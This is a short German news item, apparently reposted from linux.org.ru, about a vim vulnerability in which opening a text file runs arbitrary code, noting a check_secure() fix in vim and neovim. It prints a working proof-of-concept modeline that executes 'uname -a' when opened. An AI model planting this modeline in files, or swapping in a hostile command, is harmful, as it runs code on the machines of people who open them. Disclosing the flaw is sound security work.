Sicherheitslücke in vim

Im Texteditor vim wurde eine Sicherheitslücke veröffentlicht, die die Ausführung beliebigen Codes ermöglicht, wenn der Editor eine Textdatei öffnet.

Hier ist der Text der Datei, die das harmlose uname -a ausführt

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source! %"):fdl=0:fdt="

Ein Fix in Form eines hinzugefügten check_secure()-Aufrufs ist bereits in den vim- und neovim-Repositorys verfügbar.

Source: linux.org.ru

Kaufen Sie zuverlässiges Hosting für Websites mit DDoS-Schutz und VPS-VDS-Servern 🔥 Kaufen Sie zuverlässiges Webhosting mit DDoS-Schutz, VPS- und VDS-Server | ProHoster